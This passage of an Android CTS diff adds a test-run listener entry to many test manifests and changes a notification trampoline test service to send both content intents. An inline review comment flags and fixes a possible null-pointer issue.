+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/hardware/AndroidManifest.xml b/tests/tests/hardware/AndroidManifest.xml
index 4512fe5..9660e87 100644
--- a/tests/tests/hardware/AndroidManifest.xml
+++ b/tests/tests/hardware/AndroidManifest.xml
@@ -129,6 +129,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.hardware.cts"
android:label="CTS hardware tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/hibernation/AndroidManifest.xml b/tests/tests/hibernation/AndroidManifest.xml
index bf8d8d3..80ccd37 100644
--- a/tests/tests/hibernation/AndroidManifest.xml
+++ b/tests/tests/hibernation/AndroidManifest.xml
@@ -23,6 +23,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.hibernation.cts"
android:label="CTS tests of android.hibernation">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/icu/icu4c_testapp/AndroidManifest.xml b/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
index 134f265..c2051b4 100644
--- a/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
+++ b/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.icu4c.cts"
android:label="CTS tests for ICU4C">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/identity/AndroidManifest.xml b/tests/tests/identity/AndroidManifest.xml
index 31fb920..7dcb297 100644
--- a/tests/tests/identity/AndroidManifest.xml
+++ b/tests/tests/identity/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.identity.cts"
android:label="CTS tests of android.security.identity.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/jni/AndroidManifest.xml b/tests/tests/jni/AndroidManifest.xml
index 0a773bd..4a534db 100644
--- a/tests/tests/jni/AndroidManifest.xml
+++ b/tests/tests/jni/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.jni.cts"
android:label="CTS tests of calling native code via JNI">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/jvmti/attaching/AndroidManifest.xml b/tests/tests/jvmti/attaching/AndroidManifest.xml
index c47ad83..9e61bcd 100644
--- a/tests/tests/jvmti/attaching/AndroidManifest.xml
+++ b/tests/tests/jvmti/attaching/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.jmvti.attaching.cts"
android:label="CTS tests for attaching jvmti agents from inside the app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/keystore/AndroidManifest.xml b/tests/tests/keystore/AndroidManifest.xml
index 447c726..f97fd16 100644
--- a/tests/tests/keystore/AndroidManifest.xml
+++ b/tests/tests/keystore/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.keystore.cts"
android:label="CTS tests of android.keystore.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/libcoreapievolution/AndroidManifest.xml b/tests/tests/libcoreapievolution/AndroidManifest.xml
index d7c4395..f89f5fd 100644
--- a/tests/tests/libcoreapievolution/AndroidManifest.xml
+++ b/tests/tests/libcoreapievolution/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.apievolution.cts"
android:label="CTS tests for required method signatures on device">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/libcorefileio/AndroidManifest.xml b/tests/tests/libcorefileio/AndroidManifest.xml
index c6a95b5..7ef7c14 100644
--- a/tests/tests/libcorefileio/AndroidManifest.xml
+++ b/tests/tests/libcorefileio/AndroidManifest.xml
@@ -38,6 +38,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.libcorefileio.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/libcorelegacy22/AndroidManifest.xml b/tests/tests/libcorelegacy22/AndroidManifest.xml
index fb82240..98478e4 100644
--- a/tests/tests/libcorelegacy22/AndroidManifest.xml
+++ b/tests/tests/libcorelegacy22/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.libcorelegacy22.cts"
android:label="CTS tests of android APIs last available in API 22">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/libnativehelper/AndroidManifest.xml b/tests/tests/libnativehelper/AndroidManifest.xml
index f2ec251..01f1c5e 100644
--- a/tests/tests/libnativehelper/AndroidManifest.xml
+++ b/tests/tests/libnativehelper/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.libnativehelper.cts"
android:label="CTS tests of android.libnativehelper">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/libthermalndk/AndroidManifest.xml b/tests/tests/libthermalndk/AndroidManifest.xml
index c4521a1..eb6eb22 100644
--- a/tests/tests/libthermalndk/AndroidManifest.xml
+++ b/tests/tests/libthermalndk/AndroidManifest.xml
@@ -24,5 +24,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.thermal.cts"
android:label="CTS Thermal tests of android.thermal" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/match_flags/AndroidManifest.xml b/tests/tests/match_flags/AndroidManifest.xml
index 905861e..2878bd5 100644
--- a/tests/tests/match_flags/AndroidManifest.xml
+++ b/tests/tests/match_flags/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.matchflags.cts"
android:label="CTS tests for match flags">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/media/audio/AndroidManifest.xml b/tests/tests/media/audio/AndroidManifest.xml
index d0ca9ea..0681108 100644
--- a/tests/tests/media/audio/AndroidManifest.xml
+++ b/tests/tests/media/audio/AndroidManifest.xml
@@ -53,6 +53,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.audio.cts"
android:label="CTS tests of android.media.audio">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/codec/AndroidManifest.xml b/tests/tests/media/codec/AndroidManifest.xml
index 9b6d960..383a03a 100644
--- a/tests/tests/media/codec/AndroidManifest.xml
+++ b/tests/tests/media/codec/AndroidManifest.xml
@@ -55,6 +55,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.codec.cts"
android:label="CTS tests of android.media">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/decoder/AndroidManifest.xml b/tests/tests/media/decoder/AndroidManifest.xml
index 6e627cd..d25d904 100644
--- a/tests/tests/media/decoder/AndroidManifest.xml
+++ b/tests/tests/media/decoder/AndroidManifest.xml
@@ -50,6 +50,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.decoder.cts"
android:label="CTS tests of android.media">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/drmframework/AndroidManifest.xml b/tests/tests/media/drmframework/AndroidManifest.xml
index 64bd305..fd146bd 100644
--- a/tests/tests/media/drmframework/AndroidManifest.xml
+++ b/tests/tests/media/drmframework/AndroidManifest.xml
@@ -38,6 +38,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.drmframework.cts"
android:label="CTS tests of android MediaDrm">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/encoder/AndroidManifest.xml b/tests/tests/media/encoder/AndroidManifest.xml
index cddc623..b6d56f3 100644
--- a/tests/tests/media/encoder/AndroidManifest.xml
+++ b/tests/tests/media/encoder/AndroidManifest.xml
@@ -38,6 +38,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.encoder.cts"
android:label="CTS tests of android.media">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/extractor/AndroidManifest.xml b/tests/tests/media/extractor/AndroidManifest.xml
index 4f59705..82f45b9 100644
--- a/tests/tests/media/extractor/AndroidManifest.xml
+++ b/tests/tests/media/extractor/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.extractor.cts"
android:label="CTS tests of android MediaExtractor">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/misc/AndroidManifest.xml b/tests/tests/media/misc/AndroidManifest.xml
index f831ab1..08db1d4 100644
--- a/tests/tests/media/misc/AndroidManifest.xml
+++ b/tests/tests/media/misc/AndroidManifest.xml
@@ -82,6 +82,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.misc.cts"
android:label="CTS tests of android.media">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/muxer/AndroidManifest.xml b/tests/tests/media/muxer/AndroidManifest.xml
index 7232c2c..f914229 100644
--- a/tests/tests/media/muxer/AndroidManifest.xml
+++ b/tests/tests/media/muxer/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.muxer.cts"
android:label="CTS tests of android MediaMuxer">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/player/AndroidManifest.xml b/tests/tests/media/player/AndroidManifest.xml
index 51c7f5f..a43fffc 100644
--- a/tests/tests/media/player/AndroidManifest.xml
+++ b/tests/tests/media/player/AndroidManifest.xml
@@ -59,6 +59,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.player.cts"
android:label="CTS tests of android MediaPlayer">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/recorder/AndroidManifest.xml b/tests/tests/media/recorder/AndroidManifest.xml
index c102781..28ddf67 100644
--- a/tests/tests/media/recorder/AndroidManifest.xml
+++ b/tests/tests/media/recorder/AndroidManifest.xml
@@ -37,6 +37,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.recorder.cts"
android:label="CTS tests of android MediaRecorder">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/mediaparser/AndroidManifest.xml b/tests/tests/mediaparser/AndroidManifest.xml
index a457dc3..f0f6d97 100644
--- a/tests/tests/mediaparser/AndroidManifest.xml
+++ b/tests/tests/mediaparser/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.mediaparser.cts"
android:label="Tests for MediaParser.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/mediastress/AndroidManifest.xml b/tests/tests/mediastress/AndroidManifest.xml
index 1e6f1ba..9f717fc 100644
--- a/tests/tests/mediastress/AndroidManifest.xml
+++ b/tests/tests/mediastress/AndroidManifest.xml
@@ -49,6 +49,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mediastress.cts"
android:label="Media stress tests InstrumentationRunner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/mediatranscoding/AndroidManifest.xml b/tests/tests/mediatranscoding/AndroidManifest.xml
index 9c0b950..c69754a 100644
--- a/tests/tests/mediatranscoding/AndroidManifest.xml
+++ b/tests/tests/mediatranscoding/AndroidManifest.xml
@@ -34,5 +34,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.mediatranscoding.cts"
android:label="Tests for MediaTranscoding.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/midi/AndroidManifest.xml b/tests/tests/midi/AndroidManifest.xml
index 036844d..186d1dd 100755
--- a/tests/tests/midi/AndroidManifest.xml
+++ b/tests/tests/midi/AndroidManifest.xml
@@ -41,5 +41,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS MIDI tests"
android:targetPackage="android.midi.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/mimemap/AndroidManifest.xml b/tests/tests/mimemap/AndroidManifest.xml
index bd2169f..ffb8a69 100644
--- a/tests/tests/mimemap/AndroidManifest.xml
+++ b/tests/tests/mimemap/AndroidManifest.xml
@@ -18,5 +18,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.type.cts"
android:label="CTS MimeMap test cases">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/nativehardware/AndroidManifest.xml b/tests/tests/nativehardware/AndroidManifest.xml
index 0fc8281..866e30a 100644
--- a/tests/tests/nativehardware/AndroidManifest.xml
+++ b/tests/tests/nativehardware/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.hardware.nativehardware.cts"
android:label="CTS native hardware tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/nativemidi/AndroidManifest.xml b/tests/tests/nativemidi/AndroidManifest.xml
index 609fa59..f89d012 100755
--- a/tests/tests/nativemidi/AndroidManifest.xml
+++ b/tests/tests/nativemidi/AndroidManifest.xml
@@ -46,5 +46,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS Native MIDI tests"
android:targetPackage="android.nativemidi.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/ndef/AndroidManifest.xml b/tests/tests/ndef/AndroidManifest.xml
index 0daae75..57320da 100644
--- a/tests/tests/ndef/AndroidManifest.xml
+++ b/tests/tests/ndef/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.ndef.cts"
android:label="CTS tests of NDEF data classes">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
index 6c04451..0d8c67a 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.netsecpolicy.usescleartext_false.cts"
android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is set to denied.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
index 04a589d..1dc9e61 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.netsecpolicy.usescleartext_true.cts"
android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is set to permitted.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
index 45ef96d..711ddb6 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.netsecpolicy.usescleartext_unspecified.cts"
android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is not specified.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
index 7c58e78..ef8a381 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigAttributeTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
index cfbaffd..ac81332 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDomainConfigTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
index 9590352..f73c143 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigPrePCleartextTrafficTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
index 53a4e4b..b6dcfd7 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigCleartextTrafficTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
index 8636edf..b995fb2 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDebugDisabledTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
index 96c543d..c8a69f3 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
@@ -29,5 +29,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDebugEnabledTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
index 05fd57a..715952a 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigDownloadManagerTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
index 2043ee6..05b08b4 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigInvalidPinTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
index 6096ed2..9de61b2 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigNestedDomainConfigTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
index 1b97069..699a1ad 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.net.config.cts.CtsNetSecConfigResourcesSrcTestCases"
android:label="">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/nfc/AndroidManifest.xml b/tests/tests/nfc/AndroidManifest.xml
index b4404ae..ae7fa49 100644
--- a/tests/tests/nfc/AndroidManifest.xml
+++ b/tests/tests/nfc/AndroidManifest.xml
@@ -42,6 +42,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Nfc CardEmulation API"
android:targetPackage="android.nfc.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java b/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
index 120186b..81d10e1 100644
--- a/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
+++ b/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
@@ -40,6 +40,7 @@
import java.lang.ref.WeakReference;
import java.util.Set;
+import java.util.concurrent.atomic.AtomicInteger;
import java.util.stream.Stream;
/**
@@ -133,20 +134,21 @@
break;
}
case MESSAGE_CLICK_NOTIFICATION: {
- PendingIntent intent = Stream
- .of(mNotificationManager.getActiveNotifications())
+ AtomicInteger counter = new AtomicInteger();
+ Stream.of(mNotificationManager.getActiveNotifications())
.filter(sb -> sb.getId() == notificationId)
- .map(sb -> sb.getNotification().contentIntent)
- .findFirst()
- .orElse(null);
- if (intent != null) {
- try {
- intent.send();
- } catch (PendingIntent.CanceledException e) {
- throw new IllegalStateException("Notification PI cancelled", e);
- }
- }
- sendMessageToTest(mCallback, TEST_MESSAGE_NOTIFICATION_CLICKED, intent != null);
+ .flatMap(sb -> Stream.of(sb.getNotification().contentIntent,
+ sb.getNotification().publicVersion.contentIntent))
+ .forEach(intent -> {
+ try {
+ intent.send();
+ } catch (PendingIntent.CanceledException e) {
+ throw new IllegalStateException("Notification PI cancelled", e);
+ }
+ counter.getAndIncrement();
+ });
+ sendMessageToTest(mCallback, TEST_MESSAGE_NOTIFICATION_CLICKED,
+ counter.get() == 2);
break;
}
default:
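Review bot: The new `MESSAGE_CLICK_NOTIFICATION` branch reads `sb.getNotification().publicVersion.contentIntent` and calls `intent.send()` with no null handling, whereas the removed code guarded with `if (intent != null)`. A matching notification that has no public version, or no content intent, would therefore throw a NullPointerException inside the service instead of reporting `false` to the test. Guarding `publicVersion` and filtering out null intents before the `forEach` keeps the failure visible as a test result, because the counter then stays below 2. The `counter.get() == 2` check also presumably relies on exactly one active notification matching `notificationId`; a short comment saying so would help. The enclosing switch statement starts and ends outside this hunk.

```java
Stream.of(mNotificationManager.getActiveNotifications())
        .filter(sb -> sb.getId() == notificationId)
        .flatMap(sb -> {
            Notification posted = sb.getNotification();
            Notification publicVersion = posted.publicVersion;
            return Stream.of(posted.contentIntent,
                    publicVersion == null ? null : publicVersion.contentIntent);
        })
        // A missing intent leaves the counter below 2, so the test is told "false".
        .filter(intent -> intent != null)
        // … unchanged: forEach that sends each intent and increments counter …
```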
@@ -164,10 +166,16 @@
}
private void postNotification(int notificationId, PendingIntent intent) {
+ Notification publicNotification =
+ new Notification.Builder(this, NOTIFICATION_CHANNEL_ID)
+ .setSmallIcon(android.R.drawable.ic_info)
+ .setContentIntent(intent)
+ .build();
Notification notification =
new Notification.Builder(this, NOTIFICATION_CHANNEL_ID)
.setSmallIcon(android.R.drawable.ic_info)
.setContentIntent(intent)
+ .setPublicVersion(publicNotification)
.build();
NotificationChannel notificationChannel = new NotificationChannel(NOTIFICATION_CHANNEL_ID,
NOTIFICATION_CHANNEL_ID, NotificationManager.IMPORTANCE_DEFAULT);
diff --git a/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
index ab456f4..25566a1 100644
--- a/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
